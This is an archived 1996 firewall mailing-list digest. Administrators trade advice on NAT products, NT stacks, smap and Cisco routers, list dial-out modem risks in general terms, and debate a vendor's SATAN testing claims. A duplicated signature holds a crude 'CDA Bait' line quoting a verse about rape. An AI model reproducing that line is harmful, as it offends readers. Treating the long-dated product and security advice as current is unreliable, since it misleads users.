biggest threat otherwise. Our anonymous ftp archives have a lot of this stuff. Regards, Bob Bosen Enigma Logic Inc. 2151 Salvio St. #301 Concord, CA 94520 USA Tel: +1 510 827-5707 Internet: bbosen@netcom.com http://www.safeword.com ftp://ftp.safeword.com/download/ or ftp://ftp.enigmalogic.com ************************************************************************** * "It wasn't me!!! Somebody must have captured my username/password!!!" * ************************************************************************** From firewalls-owner Wed Feb 7 12:19:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA23583 for firewalls-outgoing; Wed, 7 Feb 1996 11:33:42 -0800 (PST) Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA23574 for ; Wed, 7 Feb 1996 11:33:29 -0800 (PST) Received: from cixgate by relay2.UU.NET with SMTP id QQabxu25738; Wed, 7 Feb 1996 14:31:13 -0500 (EST) Received: from manzanita.DEV.3Com.COM.noname ([139.87.180.206]) by cixgate (4.1/SMI-4.1/3com-cixgate-GCA-931027-01) id AA20468; Wed, 7 Feb 96 11:40:29 PST Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) id AA00903; Wed, 7 Feb 96 11:25:07 PST Date: Wed, 7 Feb 96 11:25:07 PST From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9602071925.AA00903@manzanita.DEV.3Com.COM.noname> To: firewalls@greatcircle.com Subject: Cost of Address Translation systems Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can anyone give me the costs (hardware and software) for address translation systems. Hopefully along with their names. Thanks, BobK From firewalls-owner Wed Feb 7 13:09:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA28114 for firewalls-outgoing; Wed, 7 Feb 1996 12:49:21 -0800 (PST) Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA28103 for ; Wed, 7 Feb 1996 12:49:16 -0800 (PST) From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id PAA09349; Wed, 7 Feb 1996 15:48:13 -0500 (EST) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id PAA05677; Wed, 7 Feb 1996 15:48:11 -0500 (EST) Date: Wed, 7 Feb 1996 15:48:11 -0500 (EST) Message-Id: <199602072048.PAA05677@SPARKY.CF.CS.YALE.EDU> To: doug@fc.com, firewalls@GreatCircle.COM Subject: Re: NT Firewalls/Web Servers Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Doug@fc.com wrote: >Does anyone know of any good NT Firewalls and Web Servers? Have you looked at WinGate? It is a proxying system for Windows 95 and NT which allows you to use one machine which dials up an ISP to act as a proxy for your entire network. It can also straddle two ethernets instead. They have proxies similar to TIS FWTK, a nice generic proxy with flexible configuration rules, a SOCKs implementation. There are a number of different good Web Servers for NT (Netscape's, Microsoft's, O'Reilly & Assoc. WebSite, etc.): http://home.netscape.com/ http://www.microsoft.com/ http://website.ora.com/ - Morrow From firewalls-owner Wed Feb 7 13:31:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA23659 for firewalls-outgoing; Wed, 7 Feb 1996 11:35:06 -0800 (PST) Received: from foxtrot.worldcom.com (foxtrot.worldcom.com [198.64.193.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA23644 for ; Wed, 7 Feb 1996 11:34:49 -0800 (PST) Received: (from smtp@localhost) by foxtrot.worldcom.com (8.7.1/8.6.9) id NAA19803 for ; Wed, 7 Feb 1996 13:24:34 -0600 (CST) Received: from samba.worldcom.com(198.64.193.32) by foxtrot.worldcom.com via smap (V1.3) id sma019734; Wed Feb 7 13:23:53 1996 Received: (smtp@localhost) by samba.worldcom.com (8.6.11/8.6.9) id NAA08549 for ; Wed, 7 Feb 1996 13:23:51 -0600 Received: from samba.worldcom.com(198.64.193.32) by samba.worldcom.com via smap (V1.3) id sma008544; Wed Feb 7 13:23:28 1996 Date: Wed, 7 Feb 1996 13:23:28 -0600 (CST) From: Robert Dana Reply-To: Robert Dana Subject: I want details!!! Re: NT's TCP/IP stack To: firewalls@greatcircle.com In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk OK, I'm getting really frustrated about the lack of details about NT's deficiencies. I couldn't care less about OS bigotry- I'll use whatever systems meet my needs (which often include security). I have seen, over and over again, posts that basically say "I've personally verified that NT sucks for {security, networking, multitasking, Internet services}. Don't believe the MS marketing hype". For example: Scott Barman writes: > Hopefully, when folks put NT on the internet, they will find the same > thing I found through experimentation: it has multitasking that can't > get out of its own way, it can't handle the load of a medium-low > environment, and if something goes wrong, there isn't a quick interface > to fix things (by passing that maze of twisty little menus all > different!). [...] > Yea, it's called living the hype and beliving the b.s. from marketing > machines. No controversy here--especially when I don't believe what I > read or hear from know M.$.... err... b.s. artists. I don't mean to single Scott out- his is just the most recent example. We can bitch about MS's unsubstantiated marketing claims all we want, but making similarly unsubstantiated claims opposing them doesn't help at all. Exactly what are the deficiencies of the IP or TCP implementations of NT for the environment most of us care about (IP over ethernet)? Why won't a firewall on NT be capable of handling a connection faster than 64k? One of the most valuable things about forums like this is the potential to share information that cuts through all the BS that floats around out there in the form of marketing materials and vendor-biased trade publications. I'm constantly disappointed about how little valuable knowledge is really posted. And please- keep your OS religion to yourself. Sure, UNIX is what I'm most comfortable with for now, but that doesn't change the fact that I have to deal with NT whether I want to or not. GIVE US FACTS. -Robert -- Robert Dana (713) 650-6522 x240 Director of Network Services WorldCom, the International Network for Lotus Notes From firewalls-owner Wed Feb 7 13:39:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA29407 for firewalls-outgoing; Wed, 7 Feb 1996 13:16:19 -0800 (PST) Received: from eagle.wd.cubic.com ([149.63.94.9]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA29402 for ; Wed, 7 Feb 1996 13:16:15 -0800 (PST) Received: (mischler@localhost) by eagle.wd.cubic.com (8.6.9/8.3) id NAA08977; Wed, 7 Feb 1996 13:15:20 -0800 Date: Wed, 7 Feb 1996 13:15:20 -0800 From: Dave Mischler Message-Id: <199602072115.NAA08977@eagle.wd.cubic.com> To: bobk@manzanita.DEV.3Com.COM, firewalls@GreatCircle.COM Subject: Re: Cost of Address Translation systems Sender: firewalls-owner@GreatCircle.COM Precedence: bulk IPRoute runs on a PC and is shareware for $50. http://www.mischler.com/iproute/ From firewalls-owner Wed Feb 7 13:42:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA29452 for firewalls-outgoing; Wed, 7 Feb 1996 13:17:24 -0800 (PST) Received: from count04.mry.scruznet.com (count04.mry.scruznet.com [204.147.227.68]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA29443 for ; Wed, 7 Feb 1996 13:17:17 -0800 (PST) From: firewalls@count04.mry.scruznet.com Received: from count04.mry.scruznet.com (localhost [127.0.0.1]) by count04.mry.scruznet.com (8.7.3/8.7.1) with ESMTP id NAA04755; Wed, 7 Feb 1996 13:09:56 -0800 (PST) Message-Id: <199602072109.NAA04755@count04.mry.scruznet.com> To: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) cc: firewalls@GreatCircle.COM, firewalls@count04.mry.scruznet.com Subject: Re: Cost of Address Translation systems In-reply-to: Your message of "Wed, 07 Feb 1996 11:25:07 PST." <9602071925.AA00903@manzanita.DEV.3Com.COM.noname> Date: Wed, 07 Feb 1996 13:09:56 -0800 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk try darren reed... he's on the list with ip-filter 3.02b it has the feature you are requesting From firewalls-owner Wed Feb 7 14:16:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01538 for firewalls-outgoing; Wed, 7 Feb 1996 13:52:15 -0800 (PST) Received: from relay2.smtp.psi.net (relay2.smtp.psi.net [38.8.188.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA01533; Wed, 7 Feb 1996 13:52:10 -0800 (PST) Received: from radisys.radisys.com by relay2.smtp.psi.net (8.6.12/SMI-5.4-PSI) id QAA22881; Wed, 7 Feb 1996 16:50:50 -0500 Received: from msmail.radisys.com by radisys.radisys.com id aa01808; 7 Feb 96 13:46 PST Received: by msmail.radisys.com with Microsoft Mail id <31191E61@msmail.radisys.com>; Wed, 07 Feb 96 13:49:21 PST From: Jesse Gambetti To: firewalls-owner Cc: firewalls Subject: Firewall Date: Wed, 07 Feb 96 13:48:00 PST Message-ID: <31191E61@msmail.radisys.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Our company is currently running a SCO box as our gateway w/ a netblazer doing packet filtering and a 14.4k link to the net. I've taken over internet as one of my primary responsibilities here and working with the engineers that maintained the inet access here before we've decided to switch to BSDi on our gateway, we ordered a CISCO firewall router that will support a new 256k partial frame t1. Being new to firewalls myself I'm kind of reading as much as I can while learning the admin side of BSDi. My question is this, will the Cisco router provide enough security for our company? We are starting to become very concerned with security. If you need any other info I'll be happy to provide it if I know it. Jesse Gambetti IS Technician jgambetti@radisys.com From firewalls-owner Wed Feb 7 15:10:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02439 for firewalls-outgoing; Wed, 7 Feb 1996 14:08:40 -0800 (PST) Received: from smtp-gw01.ny.us.ibm.net ([165.87.194.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA02434 for ; Wed, 7 Feb 1996 14:08:35 -0800 (PST) From: pcuser@slip67-241.ny.us.ibm.net Received: (from uucp@localhost) by smtp-gw01.ny.us.ibm.net (8.6.9/8.6.9) id WAA65987 for < @smtp-gw01.ny.us.ibm.net:Firewalls@GreatCircle.COM>; Wed, 7 Feb 1996 22:07:43 GMT Message-Id: <199602072207.WAA65987@smtp-gw01.ny.us.ibm.net> Received: from slip67-241.ny.us.ibm.net(129.37.67.241) by smtp-gw01.ny.us.ibm.net via smap (V1.3mjr) id smaNZYDe7; Wed Feb 7 22:07:36 1996 Date: Tue, 6 Feb 96 10:04:23 PST Subject: Firewalls Product Comparison To: @smtp-gw01.ny.us.ibm.net:Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi guys, I need to prepare a comparative study between Sun´s Firewall 1 and IBM NetSP, for the end of this week. Does anyone Knows where I could find some interesting articles concerning both of these products?? Any help woul be appreciated. Wilmer Caripe EMSCA - ENGINEERING AND MANUFACTURING SYSTEMS CARACAS, VENEZUELA From firewalls-owner Wed Feb 7 15:18:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02806 for firewalls-outgoing; Wed, 7 Feb 1996 14:15:13 -0800 (PST) Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA02801 for ; Wed, 7 Feb 1996 14:15:08 -0800 (PST) Received: from IMXGATE.COM by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 6453; Wed, 07 Feb 96 17:14:09 EST Received: from oceanspray.com by imxgate.com (IBM VM SMTP V2R3) with TCP; Wed, 07 Feb 96 17:05:14 EST Received: from OCNSPRAY-Message_Server by oceanspray.com with Novell_GroupWise; Wed, 07 Feb 1996 17:11:18 -0500 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Wed, 07 Feb 1996 17:05:24 -0500 From: LLOYD HARTE To: firewalls@greatcircle.com Subject: RMON Data Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings, This is a little outside of a firewall question but I was wondering if any one could point me in the direction of where I could find formulas for analyzing RMON data. I want to calculate things like utilization, error rates, etc. I have looked at one tool, Axon LANreporter but it only looks at one days' worth of info and I would like to review, weeks, months, etc. Any assistance would be great! LHARTE@OCEANSPRAY.COM From firewalls-owner Wed Feb 7 15:32:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01436 for firewalls-outgoing; Wed, 7 Feb 1996 13:50:16 -0800 (PST) Received: from pfg-bh.principal.com (pfg-bh.principal.com [204.167.169.66]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA01402 for ; Wed, 7 Feb 1996 13:49:52 -0800 (PST) Received: (from uucp@localhost) by pfg-bh.principal.com (8.6.12/8.6.11) id PAA21483 for ; Wed, 7 Feb 1996 15:51:14 -0600 Received: from mailhub1.principal.com(162.131.2.16) by pfg-bh.principal.com via smap (V1.3) id sma021476; Wed Feb 7 15:50:45 1996 Received: from pfgmvs1.principal.com by mailhub1.principal.com; Wed, 7 Feb 96 15:45:54 -0600 Received: from PFGMVS1 by PFGMVS1 (IBM MVS SMTP V3R1) with BSMTP id 0414; Wed, 07 Feb 96 15:48:12 CST Date: Wed, 7 Beb 96 15:47:41 CST To: Cc: "*internet " <*INTERNE%EMC2TNN@PFGMVS1.principal.com> From: "HEROLD.BECKY" Subject: Dial-out risks Message-Id: <31191d936ebc002@mailhub1.principal.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk An important key to the success of a firewall is ensuring employees use it! This can require quite the sales job. In order to get buy-in (hopefully going from top management down through the ranks) it is necessary (in our organization anyway) to explain to people why what they want to do is a bad thing for the corporate network. One of the bad things people will want to do is install modems on PCs that are attached to the WAN and use them for "dial-out only". It is a challenging task to convince them that doing this DOES create a risk, even if they are using a non-DID phone line. (Especially if the WAN has tens of thousands of nodes spread across a geographically huge area.) At the beginning of January I posted a request for information on specific risks in putting modems on PCs that (supposedly) will be used for dial-out access only. It is assumed that the PCs are running IP, and may not be going directly to the Internet, but dialing out to other public networks such as AOL, CompuServe, Prodigy, etc.... It is also assumed that the PC may have the full set of Internet services installed, which we've found is the default for many OSs, and which, if it is not the default, can easily be loaded by most people determined they want to use the services. This information will be used in awareness messages and discussions with employees about why, typically, they need to access the Internet through the firewall. I've had some requests to post the responses I received. The following is a summary of the responses, along with some additional information I found after I posted the question. Much thanks to those of you who helped me! Since several of the responses were similar, I'm omitting attributions to them. Please, those of you who are more versed in the technical aspects of these risks than I, let me know any errors you see! Also, please contribute more risks and methods of reducing them that you can think of. ----------------------------------------------------------------------------- * Since IP is a two-way protocol, someone could gain access to the dial-out PC hard drive (and any networked system) during the dial-out session. This is true even when using the non-DID line (which basically protects against war-dialers in the event the dial-out user leaves the modem on all the time). * Viruses and trojans can be placed on the dial-out hard drive * Any files copied to diskettes and placed on the network could cause problems network-wide * Trojans can collect such goodies as passwords, credit card numbers, etc...anything passing over the network lines * The dial-out PC could be used as a repository. * If the person dials-out consistently around the same time each day, or specific days of the week, a hacker can identify when the person is connected and plant the malicious code on the PC or network during those times. * Since Windows 95, Windows for Workgroups, and other systems have remote communications capabilities built in, it becomes a bigger risk to have dial-out access because of potential macros included in files shared through these systems. It is best to turn these options off when installing the OS.) * FAX systems can be used to transfer files as data rather than images under certain sircumstances. A typical use would be to send Word documents with a hole for Word viruses. * The OS of networked PCs may be screwed up by the mixing and matching of IP stacks and clients that this sort of thing implies. For example, one incarnation of C$'s software unobviously messed with WINSOCK.DLL for one respondant which led to lots of problems trying to debug. The supportability of allowing people to mess with their PC's OS when installing dial-out software/modem needs to be considered. * IP Spoofing * Session hijacking * Users with little PC/systems knowledge installing systems on their dial-out PC that ultimately opens up the entire network (eg., enabling the IP routing feature). * Dial-out employees allowing non-employees (eg., friends, family, etc.) to use their dial-out machine as a dial-in machine to bounce them to the Internet, resulting once again in opening up the entire network. {I don't have the technical details of how this could be done....does anyone care to share?} * Denial of service attacks * Files on the dial-out PC may be copied, deleted, and possibly modified. * Files may also be copied to, deleted, or modified on the other systems attached to the network. * Changes may be made to network systems which could prevent access to the network by legitimate users. If anyone could point to a site with more techinical information about these attacks, or provide information to this list, that would be great! Here were the suggestions for dealing with the threats: * Have strong policy clearly indicating acceptable remote access methods {Definitely agree!} * Don't allow full network services on the PCs {Great advice...but how? Is there a monitoring device that can determine which PCs are running the services? How are you going to keep 18,000+ people, many of whom are PC-literate enough, from loading the services? Policies are good and necessary, but they are not preventive controls.} * Educate the employees of the risks so they won't be as likely to do something inadvertantly risky. {Absolutely agree! Will definitely help the 80% - 90% of people that want to do the right thing.} * Scan all PCs for viruses regularly, and downloaded files immediately. {Yes!} * Check PCs for Trojans regularly. {What's the most efficient way to do this?} * Encrypt confidential/proprietary data files residing on PCs and attached computer systems. {Getting info on this by subscribing to cypherpunks} * Use non-DID (outgoing calls only) phone lines to eliminate risks created when people leave their modems on, but are not actively connected. * Do a network/risk assessment to determine where your weaknesses are. * Require users to sign a usage policy. * Require users to pass through an authentication server to dial-out, using a single-use password token. Thanks, Becky Herold, Sr. Systems Analyst, Information Protection herold.becky@principal.com =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- The opinions expressed here are strictly my own and do not necessarily represent those of my employer. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From firewalls-owner Wed Feb 7 15:38:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02199 for firewalls-outgoing; Wed, 7 Feb 1996 14:03:47 -0800 (PST) Received: from gaia.aoainc.com (gaia.aoainc.com [199.93.216.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA02189 for ; Wed, 7 Feb 1996 14:03:35 -0800 (PST) Received: (from uucp@localhost) by gaia.aoainc.com (8.6.12/8.6.9) id RAA21988; Wed, 7 Feb 1996 17:02:43 -0500 Received: from aoa.aoainc.com(199.93.217.20) by gaia.aoainc.com via smap (V1.3) id sma021985; Wed Feb 7 17:02:21 1996 Received: from albedo.aoainc.com. (albedo.aoainc.com [199.93.217.155]) by aoa.aoainc.com (8.6.9/8.6.9) with SMTP id RAA27113; Wed, 7 Feb 1996 17:02:20 -0500 Message-ID: Date: Wed, 7 Feb 96 17:01:04 -0400 From: "Richard L. Snow" Subject: Re: firewalls, email, and dns To: "Lehrer, Neil" , firewalls@GreatCircle.COM X-Mailer: VersaTerm Link v1.1.1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >hi, > >our smtp mail server is an smtp/mhs gateway that runs on DOS. since it >does not have the traditional sendmail vulnerabilities can I/should I >allow smtp traffic through a firewall [] Well, it's pretty easy to use a mail forwarder such as SMAP in the TIS firewalls toolkit. If your firewall is unix you can replace the sendmail daemon with this program which is short enough that you could actualy figure out what the code is doing. The traditional argument is that if the program is complex enough that you can't tell what it's behavior will be, then there is a high risk there is a hole in there which you don't know about. -Rich Rich Snow rich@aoainc.com (617)864-0201 -----------------------------------------------* Adaptive Optics Associates, Inc. 54 Cambridgepark Dr., Cambridge, MA. 02140 From firewalls-owner Wed Feb 7 15:47:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02198 for firewalls-outgoing; Wed, 7 Feb 1996 14:03:45 -0800 (PST) Received: from grendel.texas.net (grendel.texas.net [204.96.23.204]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA02188 for ; Wed, 7 Feb 1996 14:03:35 -0800 (PST) Received: (from stend@localhost) by grendel.texas.net (8.6.10/8.6.9) id PAA09076; Wed, 7 Feb 1996 15:25:08 -0600 Date: Wed, 7 Feb 1996 15:25:08 -0600 From: Sten Drescher Message-Id: <199602072125.PAA09076@grendel.texas.net> To: "Kenneth J. Stephens" CC: goertzek@wangfed.com, firewalls@GreatCircle.COM In-reply-to: "Kenneth J. Stephens"'s message of Tue, 6 Feb 1996 10:40:05 -0500 (EDT) Subject: Re: Survey References: <199602061540.KAA18136@Fe3.rust.net> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk "Kenneth J. Stephens" said: KJS> If the magazine publishers forced the issue date onto all of KJS> their reprints the vendors would have little use for the KJS> reprints. The date stamp would obsolete the reprint so quickly KJS> that the vendor would look foolish for distributing old info. KJS> One of the hazards of a dynamic industry. Given the number of computer manufacturers which clearly include the DATE of the publication in which their products were selected a Best Buy/Editors Choice/etc., this is ludicrious. Personally, if I were to receive an undated reprint of a magazine review as part of a products promotional literature, my most favorable reaction would be to place it in the circular file, with my most probable being wondering why they don't want me to know how old the review is. OTOH, if I received reprints dated, say, June 1994, May 1995, and September 1995, that would show me that not only does this company develop a good product, but that they maintain a good product, which, to me, is extremely important. -- #include /* Sten Drescher */ Unsolicited email advertisements will be proofread for a US$100/page fee. CDA Bait: Look, I have two daughters who haven't been laid yet. How about you rape them right here, instead of my guests? Gen 19:8 From firewalls-owner Wed Feb 7 15:51:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02485 for firewalls-outgoing; Wed, 7 Feb 1996 14:09:10 -0800 (PST) Received: from icicle.winternet.com (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA02442 for ; Wed, 7 Feb 1996 14:08:55 -0800 (PST) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle.winternet.com (8.7.3/8.7.2) with ESMTP id QAA10210; Wed, 7 Feb 1996 16:07:40 -0600 (CST) Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id QAA03253; Wed, 7 Feb 1996 16:07:39 -0600 Posted-Date: Wed, 7 Feb 1996 16:07:39 -0600 Date: Wed, 7 Feb 1996 16:07:38 -0600 (CST) From: Ron DuFresne To: Chris Jenkins cc: winnt-l@eva.dc.lsoft.com, jeromie@garrison.com, firewalls@GreatCircle.COM, SATEESHB@inf.com Subject: Re: NT's TCP/IP stack + NetManage NEWT conflict. -Reply In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 7 Feb 1996, Chris Jenkins wrote: > all of the newest (and even WFW311) come with a free TCPIP stack. > Third party applications like Chameleon, LanWorkPlace, etc....come with > their own stacks. In most cases, you should be able to get applications > (Telnet, FTP, mail, etc) from one third-party product to work over anothers > TCP/IP stack. This is where the WINSOCK standard comes in. > > More specialized TCP/IP functions running on Windows (such as XServer, > 3270, etc) may require a stack/Winsock specific to that particular product. > > Since MS gives you TCP/IP and WINSOCK, most third party applications > should be able to run. If I recall correctly, I think that some of Chameleons > applications will run on MS tcp/ip stack. Yes, this is true, but you don't want to run newt with the other stack active. At one site we worked with we found wfw311 and newt in continual conflict. When just running newt, a version prior to 5.0 <3.5-4.0 I think we ran> it was very unstable. We weren't very impressed and ended up tossing newt to the sidelines. Later, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Wed Feb 7 16:07:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA05145 for firewalls-outgoing; Wed, 7 Feb 1996 14:46:20 -0800 (PST) Received: from usia.gov (XGATE.USIA.GOV [198.67.64.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA05132 for ; Wed, 7 Feb 1996 14:46:15 -0800 (PST) Received: from NetWare MHS (SMF70) by usia.gov via Connect2-SMTP 4.00; Wed, 7 Feb 96 17:45:57 -0500 Message-ID: <2C1D19310136C8D1@usia.gov> Date: Wed, 7 Feb 96 17:44:07 -0500 From: "Lehrer, Neil" Organization: USIA To: firewalls@greatcircle.com Subject: fw-1 and smapd X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk hi, are any of you firewall-1 customers putting smap on your firewall as the mail redirector? any other way to do this? i didn't see anything in the fw-1 manual other than having a rule that lets outside email go through the wall to your inside mail server and trust that? cc to my email address would be great. thanks. Regards +++++++++++++++++++++++++++++++++++++++ + Neil Lehrer + U.S. Information Agency + Networks and Systems Support Division + + voice 202 619-0903 + fax 202 619-3883 + internet nlehrer@usia.gov + + "oh what a tangled net we weave + when we seek to retrieve." + +++++++++++++++++++++++++++++++++++++++ From firewalls-owner Wed Feb 7 16:09:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA06460 for firewalls-outgoing; Wed, 7 Feb 1996 15:07:44 -0800 (PST) Received: from mail.ganton-mcr.com (mail.ganton-mcr.com [206.233.102.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA06448 for ; Wed, 7 Feb 1996 15:07:36 -0800 (PST) Received: from kia.mazama.com (sfsp95.slip.net [204.160.88.159]) by mail.ganton-mcr.com (8.6.11/8.6.9) with SMTP id PAA26783; Wed, 7 Feb 1996 15:12:36 -0800 Date: Wed, 7 Feb 1996 15:05:27 -0800 (PST) From: Larry Stelmat To: firewalls@greatcircle.com cc: info@mazama.com Subject: Re: Mazama Packet Filter: Misleading advertising In-Reply-To: <311763D4.3843@csc.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We'd like to thank Darren Reed for pointing out a poorly worded segment of our old product description. Our intent was to communicate that we had run Satan on several MPF installations and that MPF, properly configured, managed to detect and stop most of the attacks that SATAN attempts to use. The history was that earlier information did not mention SATAN, and we got frequent e-mail to asking us if we had tested MPF with SATAN. So around summer we started mentioning SATAN in later sales information. After being revised four times or more by three different people, the original intent and statement was more than a bit mangled. It is true that the current version of MPF does detect hosts that are scanning port space or address space. At MSL, our primary mission is to build a better product at a lower price. Unfortunately we have a limited number of resources. Our primary resources go into development and testing of MPF with marketing trailing as dead last. The result of which is our product is well tested (including documentation), but our sales material is crafted quickly and without much time for review. We again want to thank Darren for pointing out our problem. The efforts to ensure that published information is accurate makes the Internet a great place to do business. David Bonn, President Mazama Software Labs david@mazama.com > > The following appears on one of their web pages: > (http://www.mazama.com/mpf12desc.html): > ... > TECHNICAL SECURITY FEATURE LIST > > > _________________________________________________________________ > > > > > * Blocking of all services which are not explicitly enabled. > * Blocking of ICMP Redirect Packets. > * Blocking of IP Source Route options. > * Blocking of Spoofed IP addresses. > * Blocking of Spoofed IP fragments. > * Dangerous services such as rsh/rlogin, X window, Openwindows, > NFS, > and other RPC services are blocked by default. > * TCP Services use SYN/ACK checking to verify the direction of all > TCP connections. > * We have used SATAN to analyze MPF installations and verified that > the above security problems are solved by MPF. The current > version > of MPF can detect port scans from SATAN and automatically block > all packets from a host running SATAN. > ... > > The last item is what I would draw your attention to. > > SATAN does *NOT* test all of the above. In fact, it only does the > first. > Well, to be pedantic, it doesn't look for blocked services, but scans > looking for services which are active and are possible avenues for a > breakin. > That is unless they developed their own plug-in tests for SATAN, which > their web page doesn't brag about, so I'll assume to not be the case > O:). > > Maybe they assumed that their DHB (Dynamic Host Blocking) solved > everything > when it blocks out an entire host when it notices a SATAN style attack. > > Now, if they had of mentioned ISS, I might take it more seriously and > assume > that maybe 3 or more of the above had been checked... > > IMHO, that particular page stinks...(you can find other rich comments > there, > too...)...probably from Marcus's dead chicken that they waved around and > dropped there ;) > > darren > > (p.s. chris, if you get an order from a certain company, you owe me one > ;-) > > From firewalls-owner Wed Feb 7 16:12:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA04597 for firewalls-outgoing; Wed, 7 Feb 1996 14:38:34 -0800 (PST) Received: from grendel.texas.net (grendel.texas.net [204.96.23.204]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA04547 for ; Wed, 7 Feb 1996 14:38:10 -0800 (PST) Received: (from stend@localhost) by grendel.texas.net (8.6.10/8.6.9) id PAA09076; Wed, 7 Feb 1996 15:25:08 -0600 Date: Wed, 7 Feb 1996 15:25:08 -0600 From: Sten Drescher Message-Id: <199602072125.PAA09076@grendel.texas.net> To: "Kenneth J. Stephens" CC: goertzek@wangfed.com, firewalls@GreatCircle.COM In-reply-to: "Kenneth J. Stephens"'s message of Tue, 6 Feb 1996 10:40:05 -0500 (EDT) Subject: Re: Survey References: <199602061540.KAA18136@Fe3.rust.net> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk "Kenneth J. Stephens" said: KJS> If the magazine publishers forced the issue date onto all of KJS> their reprints the vendors would have little use for the KJS> reprints. The date stamp would obsolete the reprint so quickly KJS> that the vendor would look foolish for distributing old info. KJS> One of the hazards of a dynamic industry. Given the number of computer manufacturers which clearly include the DATE of the publication in which their products were selected a Best Buy/Editors Choice/etc., this is ludicrious. Personally, if I were to receive an undated reprint of a magazine review as part of a products promotional literature, my most favorable reaction would be to place it in the circular file, with my most probable being wondering why they don't want me to know how old the review is. OTOH, if I received reprints dated, say, June 1994, May 1995, and September 1995, that would show me that not only does this company develop a good product, but that they maintain a good product, which, to me, is extremely important. -- #include /* Sten Drescher */ Unsolicited email advertisements will be proofread for a US$100/page fee. CDA Bait: Look, I have two daughters who haven't been laid yet. How about you rape them right here, instead of my guests? Gen 19:8 From firewalls-owner Wed 